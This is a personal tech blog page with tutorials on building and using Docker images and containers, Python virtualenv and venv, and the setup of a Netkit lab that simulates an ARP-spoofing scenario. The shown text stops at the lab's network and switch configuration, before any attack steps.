Showing posts with label virtualization. Show all posts
Showing posts with label virtualization. Show all posts

19 December 2021

How to create your own custom Docker images


In a previous article we covered the basics of docker images usage. But there we used images built by others. That's great if you find the image you look for, but what happens if none fits your needs?

In this article we are going to explain how to create your own images and upload them to Docker Hub so they can be easily downloaded in your projects environments and shared with other developers.


To cook you need a recipe

Provided that you followed the tutorial previously linked, you'll have docker already installed in your linux box. Once docker is installed you need a recipe to tell it how to "cook" your image. That recipe is a file called Dockerfile that you'll create in a folder of your choice with any files you want to include in your image.

What you cook with that recipe? An image, but what is a docker image? A docker image is a ready to use virtual linux operating system with a specific configuration and set of dependencies installed. How you use that image is up to you. Some images are provided "as-is", as a base point where you are supposed to install your application and run it inside. Other images are more specific and contains an app that is executed as soon you run that image. Just keep in your mind that a docker image is like what an OOP language calls a "class", while a container is an instance of that class (an OOP language would call it an "object"). You may have many containers running after being started from the same image.

To understand how a Dockerfile works, we are going to asses some examples. 

Let's start with this Dockerfile from the vdist project. The image you build with that Dockerfile is intended to compile a python distribution and run an application called fpm over a folder is created at runtime when an image container is used. So, this Dockerfile is supposed to install every dependency to make possible compiling python and running fpm.

As a first step, every Dockerfile starts defining which image you are going to use as starting point. Following with the OOP metaphor, being our image a class, we need to define from which class inherits ours.

In this case, our image is derived from ubuntu:latest image, but you can use any image available at Docker Hub. Just take care to check that image Docker Hub page to find out which tag to use. Once you upload your image to Docker Hub others may use it as a base point for their respective images.

Every art piece must be signed. Your image is no different so you should define some metadata for it:

The real match comes with RUN commands. Those are what you use to configure your image. 

Some people misunderstand what RUN commands are intended for the first time they try to build a docker image. RUN commands are not executed when a container is created from an image with "docker run" command. Instead they are run only once by "docker build" to create an image from a Dockerfile.

The exact set of RUN command will vary depending of your respective project needs. In this example RUN commands check apt sources list are OK, update apt database and install a bunch of dependencies using both "apt-get" and "gem install". 

However, you'd better start your bunch of RUN commands with a "RUN set -e" this will make fail your entire image building process if any RUN command returns and error. May seem an extreme measure, but that way you are sure you are not uploading an image with unadvertised errors. 

Besides, when you review some Dockerfiles from other project you will find many of them include several shell commands inside the same RUN command as our example does in lines 14-16. Docker people recommends including inside the same RUN command a bunch of shell commands if they are related between them (i.e. if two commands have no sense separated, being executed without the other, they should be run inside the same RUN command). That's because of how images are built using a layer structure where every RUN command is a separate layer. Following Docker people advise, your images should be quicker to rebuilt when you perform any change over its Dockerfile. So to include several shell commands inside the same RUN command, remember to separate those commands in a line for each and append every line with a "&& \" to chain them (except the last line as the example shows). 

Apart of RUN commands, there are others you should know. Let's review the Dockerfile from my project markdown2man. That image is intended to run a python script to use Pandoc to make a file conversion using arguments passed by the user when a container is started from that image. So, to create that image you can find some now already familiar commands:


But, from there things turn interesting with some new commands.

With ENV commands you can create environments variables to be used in following building commands so you don't have to repeat the same string over and over again and simplify modifications:


Nevertheless, be aware that environment variables created with ENV commands outlast building phase and persist when a container is created from that image. That can provoke collisions with other environments variables created further. If you only need the environment variable for the building phase and want it removed when a image container is created, then use ARG commands instead of ENV ones.

To include your application files inside the image use COPY commands:


Those commands copy a source file, relative to the Dockerfile location, from the host where you are building the image to a path inside that image. In this example, we are copying a requirements.txt, which is located alongside Dockerfile, to a folder called /script (as SCIPT_PATH environment variable defines) inside the image.

Last, but not least, we find another new command: ENTRYPOINT.


An ENTRYPOINT defines which command to run when a container is started from this image so arguments passed to "docker run" are actually passed to this command. Container will stay alive until command defined at ENTRYPOINT returns. 

ENTRYPOINTS are great to use docker containers to run commands without needing to pollute your user system with packages needed to run those commands.

Time to cook

Once your recipe is ready, you must cook something with it.

When your Dockerfile is ready, use docker build command to create an image from it. Provided you are at the same folder of your Dockerfile:

dante@Camelot:~/Projects/markdown2man$ docker build -t dantesignal31/markdown2man:latest .
Sending build context to Docker daemon  20.42MB
Step 1/14 : FROM python:3.8
 ---> 67ec76d9f73b
Step 2/14 : LABEL maintainer="dante-signal31 (dante.signal31@gmail.com)"
 ---> Using cache
 ---> ca94c01e56af
Step 3/14 : LABEL description="Image to run markdown2man GitHub Action."
 ---> Using cache
 ---> b749bd5d4bab
Step 4/14 : LABEL homepage="https://github.com/dante-signal31/markdown2man"
 ---> Using cache
 ---> 0869d30775e0
Step 5/14 : RUN set -e
 ---> Using cache
 ---> 381750ae4a4f
Step 6/14 : RUN apt-get update     && apt-get install pandoc -y
 ---> Using cache
 ---> 8538fe6f0c06
Step 7/14 : ENV SCRIPT_PATH /script
 ---> Using cache
 ---> 25b4b27451c6
Step 8/14 : COPY requirements.txt $SCRIPT_PATH/
 ---> Using cache
 ---> 03c97cc6fce4
Step 9/14 : RUN pip install --no-cache-dir -r $SCRIPT_PATH/requirements.txt
 ---> Using cache
 ---> ccb0ee22664d
Step 10/14 : COPY src/lib/* $SCRIPT_PATH/lib/
 ---> d447ceaa00db
Step 11/14 : COPY src/markdown2man.py $SCRIPT_PATH/
 ---> 923dd9c2c1d0
Step 12/14 : RUN chmod 755 $SCRIPT_PATH/markdown2man.py
 ---> Running in 30d8cf7e0586
Removing intermediate container 30d8cf7e0586
 ---> f8386844eab5
Step 13/14 : RUN ln -s $SCRIPT_PATH/markdown2man.py /usr/bin/markdown2man
 ---> Running in aa612bf91a2a
Removing intermediate container aa612bf91a2a
 ---> 40da567a99b9
Step 14/14 : ENTRYPOINT ["markdown2man"]
 ---> Running in aaa4774f9a1a
Removing intermediate container aaa4774f9a1a
 ---> 16baba45e7aa
Successfully built 16baba45e7aa
Successfully tagged dantesignal31/markdown2man:latest

dante@Camelot:~$

I you weren't at the same folder than Dockerfile you should replace that ".", at the end of command, with a path to Dockerfile folder.

The "-t" parameter is used to give a proper name (a.k.a. tag) to your image. If you want to upload your image to Docker Hub try to follow its naming conventions. For an image to be uploaded to Docker Hub its name should be composed like: <docker-hub-user>/<repository>:<version>. You can see in the last console example that docker-hub-user parameter was dantesignal31 while repository was markdown2man and version was latest.

Upload your image to Docker Hub

If building process ended right you should be able to find your image registered in your system.

dante@Camelot:~/Projects/markdown2man$ docker images
REPOSITORY                   TAG                 IMAGE ID       CREATED          SIZE
dantesignal31/markdown2man   latest              16baba45e7aa   15 minutes ago   1.11GB


dante@Camelot:~$

But a only locally available image has a limited use. To make that image globally available you should upload it to Docker Hub. But to do that you first need an account at Docker Hub. The process to sign up for a new account ID is similar to any other online service.

Done the sign up process, login with your new account to Docker Hub. Once logged in, create a new repository. Remember that whatever name you give to your repository it will be prefixed with your username to get the repo full name.


In this example, full name for the repository would be mobythewhale/my-private-repo. Unless you are using a paid account you'll probably set a "Public" repository.

Remember to tag your image with a repository name according what you created at Docker Hub.

Before you can push your image you have to login to Docker Hub from your console with "docker login":

dante@Camelot:~/Projects/markdown2man$ docker login
Authenticating with existing credentials...
WARNING! Your password will be stored unencrypted in /home/dante/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded
dante@Camelot:~$

First time you log in you will be asked your username and password.

Once logged you can now upload your image with "docker push":

dante@Camelot:~/Projects/markdown2man$ docker push dantesignal31/markdown2man:latest
The push refers to repository [docker.io/dantesignal31/markdown2man]
05271d7777b6: Pushed 
67b7e520b6c7: Pushed 
90ccec97ca8c: Pushed 
f8ffd19ea9bf: Pushed 
d637246b9604: Pushed 
16c591e22029: Pushed 
1a4ca4e12765: Pushed 
e9df9d3bdd45: Mounted from library/python 
1271cc224a6b: Mounted from library/python 
740ef99eafe1: Mounted from library/python 
b7b662b31e70: Mounted from library/python 
6f5234c0aacd: Mounted from library/python 
8a5844586fdb: Mounted from library/python 
a4aba4e59b40: Mounted from library/python 
5499f2905579: Mounted from library/python 
a36ba9e322f7: Mounted from library/debian 
latest: digest: sha256:3e2a65f043306cc33e4504a5acb2728f675713c2c24de0b1a4bc970ae79b9ec8 size: 3680

dante@Camelot:~$

Your image is now available at Docker Hub, ready to be used like anyone else.

Conclusion

We reviewed the very basics about how build a docker image. From here, the only way is practicing creating increasingly complex images starting from the simpler ones. Fortunately Docker has a great documentation so it should be easy to solve any blocker you find in your way.

Hopefully all this process should be greatly simplified when Docker Desktop is finally available for linux as now is for windows or mac.

29 August 2021

How to use Docker containers


Virtualization is all about deception.

With heavy virtualization (i.e. VMware, Virtualbox, Xen) a guest operating system is deceived to think it is running in a dedicated hardware, while it is actually shared. 

With light virtualization (i.e Docker) an application is deceived to think it is using a dedicated operating system kernel, while it is actually shared too. It happens that in Linux everything but the kernel is considered an application so with Docker you can make multiple linux distribution share the same kernel (the one from host system). As this is a higher abstraction level of deception than the kind of VMware it consumes less resources, that's why is called light virtualization. It's so light that many applications are distributed in docker packages (called containers) so application is bundled along and operating system and its dependencies to be run all at once in another system and don't mess with its respective dependencies.

Sure there are things light virtualization cannot do but they are not many. For standard "level-7" application development you won't find any limitation using Docker virtualization.

Installation

In the past you could install docker from your distribution package repository. Nowadays you may find docker package in your usual package repository. But that no longer works. If you want to install docker in your computer you should ignore those packages available in your standard repositories and use official Docker repositories.

Docker provides package repositories for many distributions. For instance, here you can find instructions to install docker in an ubuntu distribution. Just be aware that if you are using an Ubuntu derivative, like Linux Mint, you're going to need to customize those instructions to set your version in apt sources list.

Once you have installed docker in your computer, you can run a Hello World app, bundled in a container, to check everything works:

dante@Camelot:~/$ sudo docker run hello-world
[sudo] password for dante:
Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
b8dfde127a29: Pull complete
Digest: sha256:7d91b69e04a9029b99f3585aaaccae2baa80bcf318f4a5d2165a9898cd2dc0a1
Status: Downloaded newer image for hello-world:latest

Hello from Docker!
This message shows that your installation appears to be working correctly.

To generate this message, Docker took the following steps:
1. The Docker client contacted the Docker daemon.
2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
(amd64)
3. The Docker daemon created a new container from that image which runs the
executable that produces the output you are currently reading.
4. The Docker daemon streamed that output to the Docker client, which sent it
to your terminal.

To try something more ambitious, you can run an Ubuntu container with:
$ docker run -it ubuntu bash

Share images, automate workflows, and more with a free Docker ID:
https://hub.docker.com/

For more examples and ideas, visit:
https://docs.docker.com/get-started/

dante@Camelot:~$

Be aware that although you might we able to run docker containers you may not be able to download and install them without sudo. If you are not comfortable working like that you can add yourself to docker group:

dante@Camelot:~/$ sudo usermod -aG docker $USER
[sudo] password for dante:

dante@Camelot:~$

You may need to log out and re log to activate change. This way you can run docker commands as an unprivileged user.

Usage 

You can make your own custom containers, but that is a topic for another article. In this article we are going to use containers customized by others.

To find available containers, head to Docker Hub and type any application or Linux distribution in its search field. Output will show you many options. If you're looking for a raw linux distribution you'd better use those tagged as "Official image". 

Guess you want to try an app in an Ubuntu Xenial, then select Ubuntu is search output and take a look to "Supported tags..." sections. There you can find how different versions are named to be downloaded. In our case we would take note of "xenial" or "16.04" tags.

Now that you know what to download, let's do it with docker pull:

dante@Camelot:~/$ docker pull ubuntu:xenial
xenial: Pulling from library/ubuntu
528184910841: Pull complete
8a9df81d603d: Pull complete
636d9303bf66: Pull complete
672b5bdcef61: Pull complete
Digest: sha256:6a3ac136b6ca623d6a6fa20a7622f098b2fae1ac05f0114386ef439d8ca89a4a
Status: Downloaded newer image for ubuntu:xenial
docker.io/library/ubuntu:xenial


dante@Camelot:~$

What you've done is download what is called an image. An image is a base package with an specific linux distribution and applications. From that base package you can derive your own custom packages or run instances of that base packages, those instances are what we call containers.

If you want to check how many images you have locally available just run docker images:

dante@Camelot:~/$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu xenial 38b3fa4640d4 4 weeks ago 135MB
hello-world latest d1165f221234 5 months ago 13.3kB



dante@Camelot:~$

You can start instances (aka containers) from those images using docker run:

dante@Camelot:~/$ docker run --name ubuntu_container_1 ubuntu:xenial
dante@Camelot:~$

Using --name you can assign an specific name to your container to identify it from other containers started from the same image.

Problem starting containers this way is that they close inmediately. If you check your containers status using docker ps

dante@Camelot:~/$ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c7baad2f7e56 ubuntu:xenial "/bin/bash" 12 seconds ago Exited (0) 11 seconds ago ubuntu_container_1
3ba89f1f37c6 hello-world "/hello" 9 hours ago Exited (0) 9 hours ago focused_zhukovsky

dante@Camelot:~$

I've used an -a flag to show every container, not only the active ones. That way you can see that ubuntu_container_1 ended its activity almost at once since start. That happens because docker containers are designed to run an specific application and close themselves when that application ends. We did not said which application to run in the container so it just closed.

Before trying anything else let's delete previous container, using docker rm, to start from scratch:

dante@Camelot:~/$ docker rm ubuntu_container_1
ubuntu_container_1

dante@Camelot:~$ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
3ba89f1f37c6 hello-world "/hello" 10 hours ago Exited (0) 10 hours ago focused_zhukovsky
dante@Camelot:~$

Now we want to keep our container alive to access its console. One way is this:

dante@Camelot:~/$ docker run -d -ti --name ubuntu_container_1 ubuntu:xenial
a14e6bcac57dd04cc777a4eac787a8465acd5b8d379591976c56de1d0acc2798

dante@Camelot:~$ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
a14e6bcac57d ubuntu:xenial "/bin/bash" 8 seconds ago Up 7 seconds ubuntu_container_1
3ba89f1f37c6 hello-world "/hello" 10 hours ago Exited (0) 10 hours ago focused_zhukovsky
dante@Camelot:~$

We've used -d flag to run container in the background and -ti to start and interactive shell and keep it open. Doing so we can see that this time container stays up. But we are not yet in container console, to access it we must do docker attach to connect with that container shell:

dante@Camelot:~/$ dante@Camelot:~$ docker attach ubuntu_container_1
root@a14e6bcac57d:/#

Now you can see that shell has changed its left identifier. You can leave container console using exit, but that stops container. To leave container keeping it active use Ctrl+p followed by Ctrl+q instead.

You can pause an idle container to save resources and resume it later using docker stop and docker start:

dante@Camelot:~/$ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
9727742a40bf ubuntu:xenial "/bin/bash" 4 minutes ago Up 4 minutes ubuntu_container_1
3ba89f1f37c6 hello-world "/hello" 10 hours ago Exited (0) 10 hours ago focused_zhukovsky
dante@Camelot:~$ docker stop ubuntu_container_1
ubuntu_container_1
dante@Camelot:~$ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
9727742a40bf ubuntu:xenial "/bin/bash" 7 minutes ago Exited (127) 6 seconds ago ubuntu_container_1
3ba89f1f37c6 hello-world "/hello" 10 hours ago Exited (0) 10 hours ago focused_zhukovsky
dante@Camelot:~$ docker start ubuntu_container_1
ubuntu_container_1
dante@Camelot:~$ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
9727742a40bf ubuntu:xenial "/bin/bash" 8 minutes ago Up 4 seconds ubuntu_container_1
3ba89f1f37c6 hello-world "/hello" 10 hours ago Exited (0) 10 hours ago focused_zhukovsky
dante@Camelot:~$

Saving your changes

Chances are that you want export changes made to an existing container so you can start new container with those changes already applied.

Best way is using dockerfiles, but I'll leave that for a further article. A quick and dirty way is to commit your changes to a new image with docker commit:

dante@Camelot:~/$ docker commit ubuntu_container_1 custom_ubuntu
sha256:e2005a0ec8302f8948958a90e2abc1e8957a15155c6e6bbf7300eb1709d4ae70
dante@Camelot:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
custom_ubuntu latest e2005a0ec830 5 seconds ago 331MB
ubuntu xenial 38b3fa4640d4 4 weeks ago 135MB
ubuntu latest 1318b700e415 4 weeks ago 72.8MB
hello-world latest d1165f221234 5 months ago 13.3kB

dante@Camelot:~$

In this example we created a new image called custom_ubuntu. Using that new image we can create new instances with the changes made so far to ubuntu_container_1.

We aware that commiting changes from a running container stops it to avoid data corruption. After commiting is ended container is resumed.


Running services from containers

So far you have a lightweight virtual machine and you have access to its console, but that is not enough as you'll want offer services from that container.

Guess you have configured a SSH server in your container and you want to access it from your LAN. In that case you need container ports to be mapped by its host and offered to LAN.

An important gotcha here is that port mapping should be configured when a container is first time started with docker run using -p flag:

dante@Camelot:~/$ docker run -d -ti -p 8888:22 --name custom_ubuntu_container custom_ubuntu
5ea2604da8c696af397cd1b1f98d7426dd68182e5edd81a56a6b739849ba1e84

dante@Camelot:~$

Now you can access to the container SSH service through host 8888 port.


Sharing files with containers

Our containers won't be isolated islands. They may need files from us or the may retrieve files to us.

One way to do that file sharing is starting containers mounting a host folder as a shared folder:

dante@Camelot:~/$ docker run -d -ti -v $(pwd)/docker_share:/root/shared ubuntu:focal
ee64e7392a77b4d0b35adadad467fe5d6a105b84290945e346f82199116b7c56

dante@Camelot:~$

Here, host folder docker_share will be accessible from container at /root/shared container path. Be aware you should enter absolute paths. I use $(pwd) as a shortcut to enter host current working folder.

Once your container is started, every file placed at its /root/shared folder will be visible from host, even after container is stopped. The other way round, that is placing a file from host to be seen at container, is possible but you will need to do sudo:

dante@Camelot:~/$ cp docker.png docker_share/.
cp: cannot create regular file 'docker_share/./docker.png': Permission denied

dante@Camelot:~/$ sudo cp docker.png docker_share/.
[sudo] password for dante:

dante@Camelot:~$

Another way of sharing is using built-in copy command:

dante@Camelot:~/$ docker cp docker.png vigorous_kowalevski:/root/shared 
dante@Camelot:~$

Here, we have copied docker.png host file to vigorous_kowalevski container /root/shared folder. Note that we didn't need sudo to run docker cp.

Other way round is also possible, just change argument order:

dante@Camelot:~/$ docker cp vigorous_kowalevski:/etc/apt/sources.list sources.list 
dante@Camelot:~$

Here we copied container sources.list to host.


From here

So far you know how to deal with docker containers. Next step is creating your own custom images using dockerfiles and sharing them through Docker Hub. I'm going to explain those topics in a further article.

 

25 December 2014

Exporting and importing a virtualenv

One nice thing I recently learnt about virtualenv environments is that they ease project exportation.

When you give one of your project to a friend or colaborator, inside a compressed file, you have to tell him which dependencies to install to run the project. Fortunately virtualenv (actually pip) gives you and automated way to do it.

Suppose you have a project folder you want to export and suppose you have made a virtualenv for that project. With your virtualenv activated, run:

(env)dante@Camelot:~/project-directory$ pip freeze > requirements.txt


This will create a file called requirements.txt. In that file pip will place all packages names and versions installed for that virtualenv. Generated file (in our case requirements.txt) should be included in exported file bundle.

To import a project exported that way, importer should uncompress project folder and create a virtualenv in its location. With that virtualenv activated pip should be called this way:

(env)otherguy@host:~/project-directory$ pip install -r requirements.txt


This call to pip will install all packages and versions included in requirements.txt. Easy and efficient.





18 October 2014

Virtual environments for real developments, playing with virtualenv

I don't know what you do but I usually develop multiple projects at the same time. Problem is that sometimes you need libraries for a project that are incompatible with those in another. That's why virtualenv exists in Python world.

Thanks to virtualenv you can keep all the Python versions, libraries, packages, and dependencies for a project separate from one another. It does it creating an isolated copy of python for your project directory without worry of affecting other projects. That is useful too if you have to develop and install libraries in a linux system where you have no sudo/root access to install anything.

Using virtualenv as part of your usual developments tools will keep you away future headaches.

First step about using virtualenv is to be sure about which version of python are you going to use in your project. Original virtualenv doesn't run right with Python 3, so if you use it you should keep yourself in Python 2.7. Fortunately, since 3.3 version Python includes it's own flavour of virtualenv built-in, called venv. Be aware that 3.3 version's venv install with no pip support but thankfully that support was added in Python 3.4. We are going to cover both of them in this article: first virtualenv and venv afterwards.

You can install virtualenv using your linux native package manager or python's pip installer. In Ubuntu you can install it through package manager doing:
dante@Camelot:~$ sudo aptitude install python-virtualenv

Using pip, should be enough with:
dante@Camelot:~$ pip install virtualenv

You can check which version you installed with:
dante@Camelot:~$ virtualenv --version

To use it, just navigate through console to your project directory an run following command:
dante@Camelot:~/project-directory$ virtualenv --no-site-packages env
New python executable in env/bin/python Installing setuptools, pip...done. dante@Camelot:~/project-directory$

That command will create a directory called env where binaries to run virtual environment are placed. The --no-site-packages flag truly isolates your work environment from the rest of your system as it does not include any packages or modules already installed on your system. That way, you have a completely isolated environment, free from any previously installed packages.

Before your work can start you should start your virtual environment running activate script:

dante@Camelot:~/project-directory$ source env/bin/activate (env)dante@Camelot:~/project-directory$
You know you are working in a virtualenv thanks to the directory name surrounded by parentheses to the left of the path in your command line. While you stay in  virtualenv all packages you install through pip will be stored in your virtual instance of python leaving your operating system python alone.

To leave virtualenv just type deactivate:

(env)dante@Camelot:~/project-directory$ deactivate dante@Camelot:~/project-directory$

You should create a virtualenv each time you start a new project.

Using venv in Python 3.4 is not so different. Nevertheless be aware that Ubuntu 14.04 comes with a broken version of venv. If you try to create a virtual environment with venv in Ubuntu 14.04, you'll get an error like this:

dante@Camelot:~/project-directory2$ pyvenv-3.4 env Error: Command '['/home/dante/project-directory2/env/bin/python3.4', '-Im', 'ensurepip', '--upgrade', '--default-pip']' returned non-zero exit status 1 dante@Camelot:~/project-directory2$

The only way I've found to fix this problem is upgrade Ubuntu release to 14.10:

dante@Camelot:~/project-directory2$ sudo do-release-upgrade -d

Several hours later you'll get an upgraded Ubuntu 14.10 system. There you may find that venv needs to be installed from a python package:
dante@Camelot:~/project-directory2$ cat /etc/issue Ubuntu 14.10 \n \l dante@Camelot:~/project-directory2$ pyvenv-3.4 env El programa «pyvenv-3.4» no está instalado. Puede instalarlo escribiendo: sudo apt-get install python3.4-venv dante@Camelot:~/project-directory2$ sudo aptitude install python3.4-venv Se instalarán los siguiente paquetes NUEVOS: python3.4-venv 0 paquetes actualizados, 1 nuevos instalados, 0 para eliminar y 0 sin actualizar. Necesito descargar 1.438 kB de archivos. Después de desempaquetar se usarán 1.603 kB. Des: 1 http://es.archive.ubuntu.com/ubuntu/ utopic/universe python3.4-venv amd64 3.4.2-1 [1.438 kB] Descargados 1.438 kB en 0seg. (1.717 kB/s) Seleccionando el paquete python3.4-venv previamente no seleccionado. (Leyendo la base de datos ... 237114 ficheros o directorios instalados actualmente.) Preparing to unpack .../python3.4-venv_3.4.2-1_amd64.deb ... Unpacking python3.4-venv (3.4.2-1) ... Processing triggers for man-db (2.7.0.2-2) ... Configurando python3.4-venv (3.4.2-1) ... dante@Camelot:~/project-directory2$ pyvenv-3.4 env

That way venv runs with no errors:
dante@Camelot:~/project-directory2$ source env/bin/activate (env)dante@Camelot:~/project-directory2$

Once in your virtual environment you can install every package you need for your development using pip and without messing python libraries of your operating system. Modern linux distributions make heavy use of python applications, so it's a good practice to keep your operating system's python libraries clean with only what is really needed by your linux and mess with application specific libraries for your developments through their respectives virtual environments. For instance, you would use virtual environment if you needed to develop in Python 3 while keeping your operating system's default python interpreter in 2.7 version:

dante@Camelot:~/project-directory2$ source env/bin/activate (env) dante@Camelot:~/project-directory2$ python Python 3.4.2 (default, Oct 8 2014, 13:08:17) [GCC 4.9.1] on linux Type "help", "copyright", "credits" or "license" for more information. >>> exit() (env) dante@Camelot:~/project-directory2$ deactivate dante@Camelot:~/project-directory2$ python Python 2.7.8 (default, Oct 8 2014, 06:57:53) [GCC 4.9.1] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>>

Don't be shy with virtual environments. You can use them in production environments, in fact they are what is actually recommended for production situations where you don't want an update of your operating system libraries break your running developed application dependencies.

20 October 2013

Creating virtual laboratories with Netkit (II)

In my previous article about Netkit, we saw a simple example of its ability to simulate a network with multiple devices. The possibilities are almost endless, but we do need some kind of automation if we want to simulate complex topologies, with many nodes and especially if we pass these topologies to other researchers to experiment with them. Netkit provides this level of automation by laboratories, directory structures containing files to configure each of the nodes automatically. The good thing is that we can compress this directory tree and pass it to other researchers who can boot the lab and have all nodes configured and running with just a single command. In addition, this compressed file is really little since the configuration files on each node are text only.

We are going to prepare an example of a laboratory to simulate a scenario in which Alice is connected to the Internet from the switched network in your organization. What she doesn't know is that an intruder has gained access to the network and intends to launch a arp-spoofing attack against Alice to find out which internet pages she visits.


First of all we set Netkit to work properly in our operating system in  laboratory mode. First step is setting global variables used by Netkit. In the previous article we configured those variables correctly, problem is that when you start a laboratory in which one of the computers is to be connected to the Internet you have to use sudo which, for security, ignores most of the global variables, including those that we configured and used as normal users. A workaround is to configure sudo to not ignore Netkit variables by editing /etc/sudoers. In the "Default" of this file we must write:

Defaults:dante env_keep+="NETKIT_HOME", env_keep+="MANPATH"

Of course, instead of dante your own username must be used. You should set PATH and common sense says that you should be able to configure the sudoers as the other two ... the problem is that  sudo does not work that way and continues to ignore the user's PATH although we we configure in sudoers that way. It is something that is already reported in the Ubuntu launchpad as a bug long dragged. The solution is to create an alias that includes the user PATH every time we use sudo. To do this edit the file .bash_aliases in our home directory and write:

#PToNETKIT.

alias sudo="sudo env PATH=$PATH"



With that Netkit has all the necessary variables, whether we use sudo as if we run it as a normal user.

Besides, version 2.6 has a bug that prevents the virtual machine that acts as a gateway to Internet to run properly, the solution is a patch that one of the authors of the application wrote on the mailing list:

========================================================
diff -Naur netkit-old/bin/script_utils netkit-new/bin/script_utils
--- netkit-old/bin/script_utils 2007-12-19 10:55:58.000000000 +0100
+++ netkit-new/bin/script_utils 2008-02-02 12:48:46.000000000 +0100
@@ -317,8 +317,8 @@
# This function starts all the hubs inside a given list
runHubs() {
local HUB_NAME BASE_HUB_NAME ACTUAL_HUB_NAME TAP_ADDRESS GUEST_ADDRESS
- HUB_NAME="$1"
while [ $# -gt 0 ]; do
+ HUB_NAME="$1"
BASE_HUB_NAME="`varReplace HUB_NAME \".*_\" \"\"`"
if [ "${BASE_HUB_NAME#tap${HUB_SOCKET_EXTENSION},}" !=
"$BASE_HUB_NAME" ]; then
# This is an Internet connected hub
@@ -328,7 +328,7 @@
startInetHub "$ACTUAL_HUB_NAME" "$TAP_ADDRESS" "$GUEST_ADDRESS"
else
# This is a normal hub
- startHub "$1"
+ startHub "$HUB_NAME"
fi
shift
done
========================================================
One way to apply this patch is to create a text file in $ NETKIT_HOME /bin/ called patch2_6_bug patch with the patch text and immediately do: 
dante@Hades:/usr/share/netkit/bin$ sudo patch script_utils patch2_6_bug patching file script_utils dante@Hades:/usr/share/netkit/bin$

This ends the worst part: Netkit preconfiguration . The good thing is that you just have to do it only once, from now on you will only have to worry about creating good laboratories .

To begin with ours, we have to create a folder to contain the directory tree and the configuration files. In that folder you create the main configuration file of the laboratory: lab.conf. We can store in that file all those parameters we would use with vstart to define a single machine . We can define how many interfaces have every node and to which collision domain would belong each one ( we must remember that, unlike hubs , switches define a different collision domain for each of its ports ). Another element that can be defined is the RAM used by every machine. You can also include information to identify the laboratory for its author, a , version, etc.. In our example, lab.conf file is as follows:

dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat lab.conf LAB_DESCRIPTION="Laboratorio para simular un ataque de ARP-Spoofing" LAB_VERSION="0.1" LAB_AUTHOR="Dante" LAB_EMAIL="dante.signal31@gmail.com" LAB_WEB="http://danteslab.blogspot.com/" PC-Alice[mem]=100 PC-Sniffer[mem]=100 Router[mem]=100 Switch[mem]=100 PC-Alice[0]=CD-A Switch[1]=CD-A PC-Sniffer[0]=CD-C Switch[2]=CD-C Router[1]=CD-B Switch[0]=CD-B Router[0]=tap,

The last line sets the eth0 interface of the router as tap. That is equivalent to establish a point to point line between the virtual machine Router (192.168.10.2) and our real PC (192.168.10.1) through which your router can go to the Internet using your PC as a gateway. In fact, when we start the lab if we do a ifconfig on your PC you will see that it has created an interface called nk_tap_root with IP 192.168.10.1. As the default route is concerned, Netkit puts a static route on Router pointing to 192.168.10.1. This allows Router go to Internet normally but if we also want to let the rest of the virtual network PCs go to Internet (using Router and real PC as gateways) we add a path in our real PC to the virtual network:

dante@Hades:~$ sudo route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.10.2

Now, inside the lab folder of the lab we are going to create a subdirectory for each virtual machine to be used.
dante@Hades:~/netkit_labs$ mkdir lab_sniffing_sw dante@Hades:~/netkit_labs$ cd lab_sniffing_sw/ dante@Hades:~/netkit_labs/lab_sniffing_sw$ mkdir Routerdante@Hades:~/netkit_labs/lab_sniffing_sw$ mkdir Switch dante@Hades:~/netkit_labs/lab_sniffing_sw$ mkdir PC-Alice dante@Hades:~/netkit_labs/lab_sniffing_sw$ mkdir PC-Snifferdante@Hades:~/netkit_labs/lab_sniffing_sw$ ls PC-Alice PC-Sniffer Router dante@Hades:~/netkit_labs/lab_sniffing_sw$

The subdirectories of the virtual machines can stay empty or be used to deposit files to make then appear in the virtual machine. For example if we wanted to Alice PC-X to have the script in /usr/bin, we would create the folder "/netkit_labs/lab_sniffing_sw/PC-Alice/usr/bin" and we wold leave there a copy of the script. In our case what we qould put in the /etc/ from each team the necessary files for configuration of network resources properly.

For the case of Alice, be as follows:
dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat ./PC-Alice/etc/network/interfaces auto lo eth0 iface lo inet loopback address 127.0.0.1 netmask 255.0.0.0 iface eth0 inet static address 192.168.0.2 netmask 255.255.255.0 gateway 192.168.0.1

The PC-Sniffer will have the following network configuration:
dante@Hades:~/netkit_labs/lab_sniffing_sw $ cat ./PC-Sniffer/etc/network/interfaces auto lo eth0 iface lo inet loopback address 127.0.0.1 netmask 255.0.0.0 iface eth0 inet static address 192.168.0.3 netmask 255.255.255.0 gateway 192.168.0.1
The router will have the following network configuration:
dante@Hades:~/netkit_labs/lab_sniffing_sw $cat ./Router/etc/network/interfaces auto lo eth1 iface lo inet loopback address 127.0.0.1 netmask 255.0.0.0 iface eth1 inet static address 192.168.0.1 netmask 255.255.255.0

Also, if we want our virtual machines perform DNS resolutions (essential if we install packages with apt or browse using lynx), we have to include a file /etc/resolv.conf on each of the virtual machines like hicimo s with /etc/network/interfaces. A copy of the contents of the file /etc/resolv.conf of our real PC will be enough.

The final step is to configure the switch and decide which services are to be started on each virtual machine. For that, Netkit lets define which commands are run during startup and shutdown of virtual machines using the startup and shutdown scripts respectively. For our lab we will create the following scripts:
dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat Switch.startup ifconfig eth0 up ifconfig eth1 up ifconfig eth2 up brctl addbr br0 brctl addif br0 eth0 brctl addif br0 eth1 brctl addif br0 eth2 brctl stp br0 on ifconfig br0 up

